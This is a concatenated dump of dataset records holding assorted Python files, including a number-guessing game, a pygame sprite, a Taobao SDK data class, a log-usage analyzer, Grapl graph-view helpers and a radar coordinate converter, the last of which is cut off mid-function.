def get_elements(lines):\n \"\"\"\n Read the elements.\n \"\"\"\n key = r\"\\s+VRHFIN\\s+=\\s*(.+):\\s+.*\"\n meta = re.compile(key)\n elements = [meta.match(x).group(1) for x in lines if meta.match(x)]\n return elements\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"module/vaspy.py","file_name":"vaspy.py","file_ext":"py","file_size_in_byte":31622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"235225265","text":" #import random module\n\nimport random\n\n #Implement GuessNumber method\n\ndef GuessNumber():\n\n #Getting input from user\n\n print(\" Guess a number within the range of 5-50. You have five chances to guess it.\")\n\n #Defining the range of numbers that contains the random numbers\n\n number = random.randint(5, 50)\n\n #Initializing countValue to 1 (the first chance)\n\n countValue = 1\n\n #Display the number of guesses\n\n print(\"Chance number\", countValue ,end=\"\")\n\n userGuess = int(input(\"? \"))\n\n #checking whether the randomly generated number is the same as userGuess\n\n\n\n while number != userGuess:\n\n if countValue == 5:\n\n #Display warning message to user\n\n print(\"Sorry you have exhausted all your chances...the correct number is \", number)\n\n break\n\n if userGuess < number:\n\n print(userGuess,\"is too low\") # Providing feedback to user\n\n countValue = countValue + 1 #Increment countValue by 1\n\n print(\"Chance number\", countValue,end=\"\")\n\n userGuess = int(input(\"? \"))\n\n elif userGuess > number:\n\n print(userGuess,\"is too high\") # Providing feedback to user\n\n countValue = countValue + 1 #Increment countValue by 1\n\n print(\"Chance number\", countValue,end=\"\")\n\n userGuess = int(input(\"? \"))\n\n
I was thinking of \", userGuess,\"!\")\n\n break\n\n\n #call GuessNumber method\n\n\n\n\nGuessNumber()","sub_path":"The Number.py","file_name":"The Number.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"348169270","text":"import pygame\n\n\nclass Coin(pygame.sprite.Sprite):\n def __init__(self, x, y, img_file):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load(img_file).convert_alpha()\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n self.state = \"SPIN\"\n self.spin_sprite = [\"assets/Sprites/goldCoin1.png\", \"assets/Sprites/goldCoin2.png\",\n \"assets/Sprites/goldCoin3.png\", \"assets/Sprites/goldCoin4.png\", \"assets/Sprites/goldCoin5.png\",\n \"assets/Sprites/goldCoin6.png\", \"assets/Sprites/goldCoin7.png\", \"assets/Sprites/goldCoin8.png\",\n \"assets/Sprites/goldCoin9.png\"]\n self.spin_index = 0\n\n def move(self):\n self.rect.x -= 20\n\n def spin(self):\n '''\n this method spins the coin\n :param = None\n :returns = None\n '''\n x = self.rect.x\n y = self.rect.y\n self.image = pygame.image.load(self.spin_sprite[self.spin_index]).convert_alpha()\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n # where im getting the error\n self.spin_index = (self.spin_index+1) % len(self.spin_sprite)\n\n def position(self):\n '''\n this method returns the positon of the sprite to a text file\n :param = None\n :returns = None\n '''\n positionref = open(\"position.txt\",\"w\")\n self.current_state = \" Position of Coin (x,y) = \"+ \"(\"+ str(self.rect.x)+\",\"+ str(self.rect.y)+\")\"\n positionref.write(self.current_state)\n positionref.close()\n","sub_path":"src/coin.py","file_name":"coin.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"27094586","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim: set ts=4 sts=4 sw=4 et:\n\n\n## @brief 视频播放信息\n# @author wuliang@maimiaotech.com\n# @version: 0.0.0\n\nfrom copy import deepcopy\nfrom datetime import datetime\nimport os\nimport sys\nimport time\nimport types\n\n_jsonEnode = None\ntry:\n import demjson\n _jsonEnode = demjson.encode\nexcept Exception:\n try:\n import simplejson\n except Exception:\n try:\n import json\n except Exception:\n raise Exception(\"Can not import any json library\")\n else:\n _jsonEnode = json.dumps\n else:\n _jsonEnode = simplejson.dumps\n\ndef __getCurrentPath():\n return os.path.normpath(os.path.join(os.path.realpath(__file__), os.path.pardir))\n\nif __getCurrentPath() not in sys.path:\n sys.path.insert(0, __getCurrentPath())\n\n\n \nfrom AndroidVlowUrl import AndroidVlowUrl\n\n \n## @brief 视频播放信息\nclass VideoPlayInfo(object):\n def __init__(self, kargs=dict()):\n super(self.__class__, self).__init__()\n\n self.__kargs = deepcopy(kargs)\n \n \n ## @brief android pad兼播放的m3u8列表文件(包含多码率)。适用大于等于3.0版本Android。\n #
    \n #
  • \n # Type: String\n #
  • \n #
  • \n # Level: Basic\n #
  • \n #
\n self.androidpad_url = None\n \n ## @brief android pad播放的mp4文件列表。适用2.3版本的Android\n #
    \n #
  • \n # Type: AndroidVlowUrl\n #
  • \n #
  • \n # Level: Object\n #
  • \n #
\n self.androidpad_v23_url = None\n \n ## @brief android phone播放的m3u8列表文件(包含多码率,)。适用大于等于3.0版本Android。\n #
    \n #
  • \n # Type: String\n #
  • \n #
  • \n # Level: Basic\n #
  • \n #
\n self.androidphone_url = None\n \n ## @brief android phone播放的mp4文件列表。适用2.3版本的Android。\n #
    \n #
  • \n # Type: AndroidVlowUrl\n #
  • \n #
  • \n # Level: Object\n #
  • \n #
\n self.androidphone_v23_url = None\n \n ## @brief Flash播放器地址,可直接通过PC浏览器播放\n #
    \n #
  • \n # Type: String\n #
  • \n #
  • \n # Level: Basic\n #
  • \n #
\n self.flash_url = None\n \n ## @brief ipad播放的m3u8列表文件(包含多码率)\n #
    \n #
  • \n # Type: String\n #
  • \n #
  • \n # Level: Basic\n #
  • \n #
\n self.ipad_url = None\n \n ## @brief iphone播放的m3u8列表文件(包含多码率)\n #
    \n #
  • \n # Type: String\n #
  • \n #
  • \n # Level: Basic\n #
  • \n #
\n self.iphone_url = None\n \n ## @brief Web嵌入html代码,可直接嵌入页面中,支持html5的video标签,支持HLS播放协议最终返回m3u8资源,否则返回mp4资源\n #
    \n #
  • \n # Type: String\n #
  • \n #
  • \n # Level: Basic\n #
  • \n #
\n self.web_url = None\n \n self.__init(kargs)\n\n def toDict(self, **kargs):\n result = deepcopy(self.__kargs)\n for key, value in self.__dict__.iteritems():\n if key.endswith(\"__kargs\"):\n continue\n if value == None:\n if kargs.has_key(\"includeNone\") and kargs[\"includeNone\"]:\n result[key] = value\n else:\n continue\n else:\n result[key] = value\n return result\n \n def _newInstance(self, name, value):\n types = self._getPropertyType(name)\n propertyType = types[0]\n isArray = types[1]\n if propertyType == bool:\n if isArray:\n if not value:\n return []\n return [x for x in value[value.keys()[0]]]\n else:\n return value\n elif propertyType == datetime:\n format = \"%Y-%m-%d %H:%M:%S\"\n if isArray:\n if not value:\n return []\n return [datetime.strptime(x, format) for x in value[value.keys()[0]]]\n else:\n return datetime.strptime(value, format)\n elif propertyType == str:\n if isArray:\n if not value:\n return []\n return [x for x in value[value.keys()[0]]]\n else:\n if not isinstance(value, basestring):\n return _jsonEnode(value)\n else:\n return value\n else:\n if isArray:\n if not value:\n return []\n return [propertyType(x) for x in value[value.keys()[0]]]\n else:\n return propertyType(value)\n \n def _getPropertyType(self, name):\n properties = {\n \n \"androidpad_url\": \"String\",\n \n \"androidpad_v23_url\": \"AndroidVlowUrl\",\n \n \"androidphone_url\": \"String\",\n \n \"androidphone_v23_url\": \"AndroidVlowUrl\",\n \n \"flash_url\": \"String\",\n \n \"ipad_url\": \"String\",\n \n \"iphone_url\": \"String\",\n \n \"web_url\": \"String\",\n }\n levels = {\n \n \"androidpad_url\": \"Basic\",\n \n \"androidpad_v23_url\": \"Object\",\n \n \"androidphone_url\": \"Basic\",\n \n \"androidphone_v23_url\": \"Object\",\n \n \"flash_url\": \"Basic\",\n \n \"ipad_url\": \"Basic\",\n \n \"iphone_url\": \"Basic\",\n \n \"web_url\": \"Basic\",\n\n }\n nameType = properties[name]\n pythonType = None\n if nameType == \"Number\":\n pythonType = int\n elif nameType == \"String\":\n pythonType = str\n elif nameType == 'Boolean':\n pythonType = bool\n elif nameType == \"Date\":\n pythonType = datetime\n elif nameType == 'Field List':\n pythonType == str\n elif nameType == 'Price':\n pythonType = float\n elif nameType == 'byte[]':\n pythonType = str\n else:\n pythonType = getattr(\n sys.modules[os.path.basename(\n os.path.dirname(os.path.realpath(__file__))) + \".\" + nameType], \n nameType)\n\n level = levels[name]\n if \"Array\" in level:\n return (pythonType, True)\n else:\n return (pythonType, False)\n \n def __init(self, kargs):\n \n if kargs.has_key(\"androidpad_url\"):\n self.androidpad_url = self._newInstance(\"androidpad_url\", kargs[\"androidpad_url\"])\n \n if kargs.has_key(\"androidpad_v23_url\"):\n self.androidpad_v23_url = self._newInstance(\"androidpad_v23_url\", kargs[\"androidpad_v23_url\"])\n \n if kargs.has_key(\"androidphone_url\"):\n self.androidphone_url = self._newInstance(\"androidphone_url\", kargs[\"androidphone_url\"])\n \n if kargs.has_key(\"androidphone_v23_url\"):\n self.androidphone_v23_url = self._newInstance(\"androidphone_v23_url\", kargs[\"androidphone_v23_url\"])\n \n if kargs.has_key(\"flash_url\"):\n self.flash_url = self._newInstance(\"flash_url\", kargs[\"flash_url\"])\n \n if kargs.has_key(\"ipad_url\"):\n self.ipad_url = self._newInstance(\"ipad_url\", kargs[\"ipad_url\"])\n \n if kargs.has_key(\"iphone_url\"):\n self.iphone_url = self._newInstance(\"iphone_url\", kargs[\"iphone_url\"])\n \n if kargs.has_key(\"web_url\"):\n self.web_url = 
self._newInstance(\"web_url\", kargs[\"web_url\"])\n","sub_path":"TaobaoSdk/Domain/VideoPlayInfo.py","file_name":"VideoPlayInfo.py","file_ext":"py","file_size_in_byte":12409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"283777027","text":"# -*- coding: utf-8 -*-\n\nimport pandas as pd\nimport numpy as np\nimport preprocessing as pp\n\n\n#%%\n# Load submission file\n\n#submission = pp.loadCSV(\"submission.txt\", sep =\"\\t\")\n#submission.drop('prediction', axis=1, inplace=True)\n\n#%% \n\ndef buildInputDeep(X):\n X['DATE'] = pd.to_datetime(X['DATE']) \n X[\"DAY_OFF\"] = X['DATE'].apply(lambda x : pp.isFerie(x)).astype(int)\n \n X['WEEK_END'] = X['DATE'].apply(lambda x: x.dayofweek>=5)\n \n X = pp.parseDate(X,drop = False)\n print(\"DateTime data parsed.\")\n\n #transform categorical data in one-hots\n X = pp.oneHot(X, \"ASS_ASSIGNMENT\", delCol = True)\n\n X.drop('YEAR', axis=1, inplace=True)\n X = pp.oneHot(X, \"MONTH\", delCol = True, prefix=\"MONTH\")\n \n X.drop('DAY', axis=1, inplace=True)\n #X_train = oneHot(X_train, \"DAY\", delCol = True, prefix=\"DAY\")\n \n X = pp.oneHot(X, \"CRENEAU\", delCol = True, prefix=\"CRENEAU\")\n print(\"Categorical data made into one-hot\") \n \n X.drop('DATE', axis=1, inplace=True)\n l = list(X)\n \n X = X.as_matrix()\n nInputDim = X.shape[1]\n nInputNumber = X.shape[0]\n XZ = np.zeros((nInputNumber,1, nInputDim))\n\n for i in range(nInputNumber):\n for k in range(nInputDim):\n XZ[i,0,k]=X[i,k]\n \n print(\"Data converted to numpy array\")\n print(\"PREPROCESSING OVER\")\n return XZ\n\n\n#%%\n\ndef buildInput():\n \n #Only DATE and ASSIGNEMENT\n \n submission = pp.loadCSV(\"submission.txt\", sep =\"\\t\")\n submission.drop('prediction', axis=1, inplace=True)\n \n X = submission\n \n X['DAY_OFF']= 0\n X['DATE'] = pd.to_datetime(X['DATE'])\n # Setting the dates 3 days earlier. 
\n X[\"DATE\"] = X[\"DATE\"].apply(lambda x: x+pd.DateOffset(days=-3))\n \n X['WEEK_END'] = X['DATE'].apply(lambda x: x.dayofweek>=5)\n \n X = pp.parseDate(submission,drop = False)\n \n \n X = pp.oneHot(X, \"ASS_ASSIGNMENT\", delCol = True)\n #X = pp.oneHot(X, \"YEAR\", delCol = True, prefix=\"YEAR\")\n X.drop('YEAR', axis=1, inplace=True)\n \n X['MONTH_1']= 0\n X = pp.oneHot(X, \"MONTH\", delCol = True, prefix=\"MONTH\")\n \n \n X.drop('DAY', axis=1, inplace=True)\n #X = pp.oneHot(X, \"DAY\", delCol = True, prefix=\"DAY\")\n \n X = pp.oneHot(X, \"CRENEAU\", delCol = True, prefix=\"CRENEAU\")\n\n X.drop('DATE', axis=1, inplace=True)\n \n \n return X\n \n#%% \n\n#Put predicted values into Y\ndef writeSubmissionFile(Y):\n \n submission = pp.loadCSV(\"submission.txt\", sep =\"\\t\")\n submission[\"prediction\"] = Y\n submission = submission.as_matrix()\n\n np.savetxt('submission-test.txt', submission,delimiter='\\t',fmt = ('%s','%s','%s'),header = \"DATE\"+\"\\t\"+\"ASS_ASSIGNMENT\"+\"\\t\"+\"prediction\",comments='')\n \n \n","sub_path":"submission.py","file_name":"submission.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"30601311","text":"class Solution:\n\tdef compressStr(test):\n\t\t\tresult = ''\n\t\t\tsize = len(test)\n\t\t\tcount = 1\n\t\t\tprevious = test[0]\n\t\t\tfor i in range(size):\n\t\t\t\tcurrent = test[i]\n\t\t\t\tif(current == previous):\n\t\t\t\t\tcount += 1\n\t\t\t\telse:\n\t\t\t\t\tresult += previous + str(count)\n\t\t\t\t\tcount = 1\n\t\t\t\t\tprevious = current\n\t\t\treturn result\n\n\n\tif __name__ == '__main__':\n\t\ttest = \"aabbb\"\n\t\tprint(compressStr(test))\n\n","sub_path":"ctci/python/chapter1/Solution_1_5.py","file_name":"Solution_1_5.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"134219135","text":"#!/usr/bin/env python\n\n## /scratch/gpfs/jiazeh/inversion_test2/zplot_signals_load_su.py\n## load data to plot one signal from adj, obs, and syn \n\n### created on Wed Dec 12 10:51:11 EST 2018\n### created by Jiaze He \n\n### per iteration, per event, syn, obs, adj loading\n\n#data_para = para_struct('data_para')\n#data_para.filenamelist = glob.glob(INPUT_path + \"*Up*\")\n\n#directory_list = list()\n#for root, dirs, files in os.walk(INPUT_path, topdown=False):\n# for name in files:\n# directory_list.append(os.path.join(root, name))\n\n#print directory_list\n\n#priny('INPUT_path', INPUT_path)\n#print(data_para.filenamelist)\n#filenamelist = [syn, obs, adj]\n#for f in data_para.filenamelist:\n# fhead=(f[len(INPUT_path)+1:len(INPUT_path)+4])\n# print(fhead)\nINPUT_adj_file = INPUT_path + 'adj/%06d/Up*' % source_num\nstream = read(INPUT_adj_file,format='SU', byteorder='<')\n # convert stream to image array\ndata = _convert_to_array(stream)\nadict = {}\nadict[INPUT_adj_file[:2]] = data\n#adict['pkt_np_array'] = data\nadict['whatever'] = 1 \nadj_data = np.asarray(data)\n\n#print('INPUT_adj_file',INPUT_adj_file)\n#print('shape of adj_data', adj_data.shape)\n\n\nINPUT_syn_file = INPUT_path + 'syn/%06d/Up*' % source_num\nstream = read(INPUT_syn_file,format='SU', byteorder='<')\n # convert stream to image array\ndata = _convert_to_array(stream)\nadict = {}\nadict[INPUT_adj_file[:2]] = data\n#adict['pkt_np_array'] = data\nadict['whatever'] = 1 \nsyn_data = np.asarray(data)\n\n#print('INPUT_syn_file',INPUT_syn_file)\n#print('shape of syn_data', syn_data.shape)\n\n\n\n\n# if 
 fhead=='syn':\n#\n# print('is'+ fhead)\n# syn_data = np.asarray(data)\n# print('shape of Ux_data:', syn_data.shape)\n# #np.save(npfile,Ux_data)\n# elif fhead=='obs':\n# print('is'+ fhead)\n# obs_data = np.asarray(data)\n# print('shape of Uz_data:', obs_data.shape)\n# #np.save(npfile,Uz_data)\n# elif fhead=='adj':\n# print('is'+ fhead)\n# adj_data = np.asarray(data)\n# print('shape of Up_data:', adj_data.shape)\n# #np.save(npfile,Uz_data)\n \n\n\n\n","sub_path":"my_inversion_test/zplot_signals_load_su.py","file_name":"zplot_signals_load_su.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"9395014","text":"from models import Company,transaction\nimport os, sys ,glob ,json,re\nimport time,ijson\nfrom collections import Counter\nclass Util:\n '''this is the class responsible for all the donkey work and heavy lifting'''\n def __init__(self ,path,date):\n self.filepath = path\n self.filename=''\n self.filelist=[]##list of all the log files to be used\n self.companies=[]#list of all companies that will be converted to json\n self.jsondirpath=os.path.join(self.filepath)\n self.tempobject={} #store the transactions temporarily\n self.obj={}#a key-value map from an API key to the name of the company that key belongs to\n self.names=[]\n self.date=date\n self.pattern='^request\\.log\\.({0})'.format(self.date) #pattern used throughout for filtering by date\n\n\n\n\n\n def getfile(self,filepath):\n '''takes the file path from the input and extracts the file name,\n which will be used to create the json'''\n\n pathparts=filepath.split('/')\n filename=pathparts[-1]\n return filename\n def filelister(self,path):\n '''searches through all the files in the directory and lists them one by one'''\n\n files=glob.glob(os.path.join(path,\"*\"))##find another way if possible\n filteredfiles=[]\n for f in files:\n file=self.getfile(f)\n match = re.match(self.pattern,file)\n if match!=None:\n filteredfiles.append(os.path.join(self.filepath,file))\n else:\n pass\n\n\n return filteredfiles\n\n def obj_dict(self,obj):\n return obj.__dict__\n ##convert the file to json\n def fileconverter(self):\n files=self.filelister(self.filepath)\n for file in files:\n os.rename(file,os.path.join(\"{0}.json\".format(file)))\n\n def cleanup(self):\n ##remove the json extension of log files\n files=self.filelister((self.filepath))\n for file in files:\n ext=file.split('.')[-1]\n\n if ext=='json':\n filename,fileext=os.path.splitext(file)\n os.rename(file,filename)\n else:\n pass\n\n\n def progressCalculator(self, load,counter,message):\n '''progress method to be called whenever we need to show a bit of progress to the user'''\n\n progress=((counter/len(load))*100)\n if progress != 100:\n\n print( \"{0}...{1}%\".format(message,int(progress)))\n sys.stdout.write(\"\\033[F\") # Cursor up one line\n time.sleep(1)\n else:\n print(\"DONE...:)\")\n sys.stdout.write(\"\\033[F\") # Cursor up one line# #\n time.sleep(1)\n def jsonFileReader(self):\n '''the worker method for extracting json objects into company information\n to be used for stats calculation\n '''\n files=self.filelister(self.jsondirpath)\n counter=0\n message=\"analyzing data\"\n count=Counter()\n for file in files:\n filename=self.getfile(file)\n match=re.match(self.pattern,filename) # check first if the file is a request file for the date stated\n if match!=None:\n\n '''this yields the JSON object lines of the file one by one, making it\n easy to look through the lines and convert them to objects we can work with'''
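\n # Each transaction is tallied in a Counter keyed by (key, type);\n # TILE usage is divided by 32 further down when totals are computed.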
\n\n\n print(\"working on files {0} of {1}:{2}) \\n\".format(counter+1,len(files),file))\n\n with open(file,'r')as jsonfile:\n jsonlines=(json.loads(line) for line in jsonfile)\n for row in jsonlines:\n key=row['key']\n type=row['type']\n co=Company(key)\n count[key,type]+=1\n transa=transaction(key)\n transa.type=type\n co.transactions.append(transa)\n if len(self.companies)==0:\n self.companies.append(co)\n self.tempobject[co.key]=co.transactions\n else:\n if any(comp for comp in self.companies if comp.key ==co.key):\n pass\n else:\n self.companies.append(co)\n self.tempobject[co.key]=co.transactions\n translist=self.tempobject[co.key]\n if any(tr for tr in translist if tr.type == transa.type):\n pass\n else:\n translist.append(transa)\n\n\n\n for key in self.tempobject:# attach names, transactions and usage counts\n for i in range(len(self.companies)):\n '''loop through the company list and add the transactions from the transactions list'''\n if self.companies[i].key==key:\n self.companies[i].name=self.obj[key]\n self.companies[i].transactions=self.tempobject[key]\n transactions=self.companies[i].transactions\n for j in range(len(transactions)):\n if transactions[j].type== 'TILE':\n transactions[j].usage=int((count[(key,transactions[j].type)])/32)\n else:\n transactions[j].usage = (count[(key, transactions[j].type)])\n\n\n else:\n pass\n self.progressCalculator(files,counter,message)\n counter+=1\n '''write the companies to a json file'''\n\n f=open('report.json','w+')\n jsonstring=json.dumps(self.companies,default=self.obj_dict)\n f.write(jsonstring)\n def keyreader(self,path):\n##read all the keys in the keys.json file\n with open(os.path.join('{0}/keys.json').format(path)) as f:\n data=ijson.items(f,'')\n for obj in data:\n keys=list(obj.keys())\n for key in keys:\n self.obj[key]=obj[key]['name']\n\n\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":6431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"444982711","text":"import json\nfrom grapl_analyzerlib.prelude import (\n AssetView,\n BaseView,\n ProcessView,\n FileView,\n IpConnectionView,\n NetworkConnectionView,\n IpPortView,\n IpAddressView,\n ProcessOutboundConnectionView,\n ProcessInboundConnectionView,\n)\nfrom grapl_analyzerlib.grapl_client import GraphClient\nfrom grapl_analyzerlib.retry import retry\n\n\ndef view_from_proto(graph_client: GraphClient, node) -> BaseView:
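\n # Dispatch on whichever oneof field is set on the proto; each branch\n # resolves the node's uid with a Dgraph lookup (get_uid below) and wraps\n # it in the matching typed view.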
\n if node.HasField(\"process_node\"):\n uid = get_uid(graph_client, node.process_node.node_key)\n assert uid\n\n return ProcessView(\n graph_client=graph_client,\n uid=uid,\n node_key=node.process_node.node_key,\n node_types={\"Process\"},\n )\n elif node.HasField(\"file_node\"):\n uid = get_uid(graph_client, node.file_node.node_key)\n\n return FileView(\n graph_client=graph_client,\n uid=uid,\n node_key=node.file_node.node_key,\n node_types={\"File\"},\n )\n elif node.HasField(\"asset_node\"):\n uid = get_uid(graph_client, node.asset_node.node_key)\n\n return AssetView(\n uid, node.asset_node.node_key, graph_client, node_types={\"Asset\"}\n )\n elif node.HasField(\"ip_address_node\"):\n uid = get_uid(graph_client, node.ip_address_node.node_key)\n\n return IpAddressView(\n uid,\n node.ip_address_node.node_key,\n graph_client,\n node_types={\"IpAddress\"},\n )\n elif node.HasField(\"ip_port_node\"):\n uid = get_uid(graph_client, node.ip_port_node.node_key)\n\n return IpPortView(\n uid, node.ip_port_node.node_key, graph_client, node_types={\"IpPort\"}\n )\n elif node.HasField(\"process_outbound_connection_node\"):\n uid = get_uid(graph_client, node.process_outbound_connection_node.node_key)\n return ProcessOutboundConnectionView(\n uid,\n node.process_outbound_connection_node.node_key,\n graph_client,\n node_types={\"ProcessOutboundConnection\"},\n )\n elif node.HasField(\"process_inbound_connection_node\"):\n uid = get_uid(graph_client, node.process_inbound_connection_node.node_key)\n return ProcessInboundConnectionView(\n uid,\n node.process_inbound_connection_node.node_key,\n graph_client,\n node_types={\"ProcessInboundConnection\"},\n )\n elif node.HasField(\"ip_connection_node\"):\n uid = get_uid(graph_client, node.ip_connection_node.node_key)\n return IpConnectionView(\n uid,\n node.ip_connection_node.node_key,\n graph_client,\n node_types={\"IpConnection\"},\n )\n elif node.HasField(\"network_connection_node\"):\n uid = get_uid(graph_client, node.network_connection_node.node_key)\n return NetworkConnectionView(\n uid,\n node.network_connection_node.node_key,\n graph_client,\n node_types={\"NetworkConnection\"},\n )\n\n elif node.HasField(\"dynamic_node\"):\n uid = get_uid(graph_client, node.dynamic_node.node_key)\n\n return BaseView(\n uid,\n node.dynamic_node.node_key,\n graph_client,\n node_types={node.dynamic_node.node_type},\n )\n else:\n raise Exception(f\"Invalid Node Type : {node}\")\n\n
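# Illustrative call (the variable names here are made up):\n# view = view_from_proto(graph_client, envelope.inner_node)\n# print(type(view).__name__, view.node_key)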
\n\n# Proto nodes don't contain a uid so we have to fetch them. It may make sense to store these uids\n# alongside the proto in the future. This makes constructing from proto relatively expensive.\n@retry()\ndef get_uid(client: GraphClient, node_key: str) -> str:\n with client.txn_context(read_only=True) as txn:\n query = \"\"\"\n query res($a: string)\n {\n res(func: eq(node_key, $a), first: 1) @cascade\n {\n uid,\n }\n }\"\"\"\n res = txn.query(query, variables={\"$a\": node_key})\n res = json.loads(res.json)\n\n if isinstance(res[\"res\"], list):\n if res[\"res\"]:\n return str(res[\"res\"][0][\"uid\"])\n else:\n raise Exception(f\"get_uid failed for node_key: {node_key} {res}\")\n else:\n return str(res[\"res\"][\"uid\"])\n","sub_path":"src/python/grapl_analyzerlib/grapl_analyzerlib/view_from_proto.py","file_name":"view_from_proto.py","file_ext":"py","file_size_in_byte":4260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"209729832","text":"from ics_hdu_backend.models import Conference\n\nclass ConferenceSave(object):\n\tdef __init__(self,request):\n\t\t\n\t\tself.session = request.POST['session']\n\t\tself.conference_topic = request.POST['conference_topic']\n\t\tself.conference_start_time = request.POST['conference_start_time']\n\t\tself.conference_end_time = request.POST['conference_end_time']\n\t\tself.conference_locations = request.POST['conference_locations']\n\n\tdef saveconference(self):\n\t\t'''\n\t\tSave the data.\n\t\t'''\n\t\tconference = Conference()\n\t\tconference.session = self.session\n\t\tconference.conference_topic = self.conference_topic\n\t\tconference.conference_start_time = self.conference_start_time\n\t\tconference.conference_end_time = self.conference_end_time\n\t\tconference.conference_locations = self.conference_locations\n\t\tconference.save()","sub_path":"ics_hdu_backend/service/conference_service.py","file_name":"conference_service.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"513296175","text":"# 2019/04/16\n# def RadarMLTConv():\n\nimport aacgmv2\nimport apexpy\n\nimport datetime\nfrom dateutil.relativedelta import relativedelta\n\nfrom itertools import compress\n\nimport numpy as np\n\n\nclass RadarMLTConv(object):\n\n def __init__(self,\n radar='ESR',\n coordSys='AACGM_v2',\n apexRefHeight_km=130,\n apexRefTime=None):\n\n self.coordSys = coordSys\n\n if self.coordSys.upper() == 'APEX':\n\n if apexRefTime == None:\n apexRefTime = datetime.datetime(2015, 1, 1)\n\n self.apexRefHeight_km = apexRefHeight_km\n self.apexRefTime = apexRefTime\n print(\"Apex ref height, date initialized to {:5d} km, {:s}\".format(\n self.apexRefHeight_km, self.apexRefTime.strftime(\"%Y-%m-%d\")))\n self.apex = apexpy.Apex(\n self.apexRefTime, refh=self.apexRefHeight_km)\n\n if radar == 'ESR':\n self.gdlat = 78.15 # deg N (Geodetic: measured by GPS)\n self.gdlon = 16.02 # deg E (Geodetic: measured by GPS)\n self.gdalt = 0.445 # km (Geodetic: measured by GPS)\n elif radar == 'TromsUHF':\n self.gdlat = 69.583\n self.gdlon = 19.23\n self.gdalt = 0.086\n\n self.radar = radar\n\n def __call__(self, dtime, *args):\n\n self.dtime = dtime\n\n if len(args) > 0:\n assert len(args) == 3, \"Must provide new gdlat, gdalt, gdlon!\"\n\n # print(args[0],args[1],args[2])\n self.gdlat = args[0]\n self.gdalt = args[1]\n self.gdlon = args[2]\n\n nNeeded = np.max(\n [self.gdlat.size, self.gdlon.size, self.gdalt.size, len(self.dtime)])\n\n assert (len(self.dtime) == nNeeded) & (self.gdlat.size == nNeeded) & (\n self.gdlon.size == nNeeded) & (self.gdalt.size == nNeeded), \"Must all be the same
størrelse!\"\n\n ##############################\n # OLD WAY\n ##############################\n # mlatCGMs = []\n # mlonCGMs = []\n # mltCGMs = []\n\n # print(\"i\",\"time\",\"lat\",\"lon\",\"alt\")\n # for i, dter in enumerate(self.dtime):\n # # print(i,dter,self.gdlat[i],self.gdlon[i],self.gdalt[i])\n\n # mlatCGM, mlonCGM, mltCGM = aacgmv2.get_aacgm_coord(self.gdlat[i],\n # self.gdlon[i],\n # self.gdalt[i],\n # dter)\n\n # mlatCGMs.append(mlatCGM)\n # mlonCGMs.append(mlonCGM)\n # mltCGMs.append(mltCGM)\n\n # return np.vstack((np.array(mlatCGMs), np.array(mlonCGMs), np.array(mltCGMs)))\n\n mlats = []\n mlons = []\n mlts = []\n tmpTimes = self.dtime\n tmpgdlats = self.gdlat\n tmpgdlons = self.gdlon\n tmpgdalts = self.gdalt\n # print(\"NTimes: \", len(tmpTimes))\n for i, dter in enumerate(tmpTimes):\n # print(i,dter,self.gdlat[i],self.gdlon[i],self.gdalt[i])\n\n # This is a way slow option for Apex coords\n self.dtime = dter\n self.gdlat = tmpgdlats[i]\n self.gdlon = tmpgdlons[i]\n self.gdalt = tmpgdalts[i]\n # print(\"{:4d} : {:s}\".format(\n # i, self.dtime.strftime(\"%Y-%m-%d\")))\n mlat, mlon, mlt = self.__getSingleCoordTuple()\n\n mlats.append(mlat)\n mlons.append(mlon)\n mlts.append(mlt)\n\n return np.vstack((np.array(mlats), np.array(mlons), np.array(mlts)))\n\n else:\n if hasattr(self.dtime, '__len__'):\n\n # mlatCGMs = []\n # mlonCGMs = []\n # mltCGMs = []\n\n # # for i,dter in enumerate(self.dtime):\n # for dter in self.dtime:\n # mlatCGM, mlonCGM, mltCGM = aacgmv2.get_aacgm_coord(self.gdlat,\n # self.gdlon,\n # self.gdalt,\n # dter)\n\n # mlatCGMs.append(mlatCGM)\n # mlonCGMs.append(mlonCGM)\n # mltCGMs.append(mltCGM)\n\n # return np.vstack((np.array(mlatCGMs), np.array(mlonCGMs), np.array(mltCGMs)))\n\n mlats, mlons, mlts = self.__getSingleCoordMultiTimeTuple()\n\n return np.vstack((np.array(mlats), np.array(mlons), np.array(mlts)))\n\n else:\n\n # mlatCGM, mlonCGM, mltCGM = aacgmv2.get_aacgm_coord(self.gdlat,\n # self.gdlon,\n # self.gdalt,\n # self.dtime)\n # return np.vstack((mlatCGM, mlonCGM, mltCGM))\n mlat, mlon, mlt = self.__getSingleCoordTuple()\n return np.vstack((mlat, mlon, mlt))\n\n def update_Apex_time(self, apexRefTime):\n\n if self.coordSys.upper() == 'APEX':\n\n assert isinstance(\n apexRefTime, datetime.date), \"Must provide a datetime!\"\n\n self.apexRefTime = apexRefTime\n\n print(\"Apex ref date reinitialized to {:s}\".format(\n self.apexRefTime.strftime(\"%Y-%m-%d\")))\n self.apex = apexpy.Apex(\n self.apexRefTime, 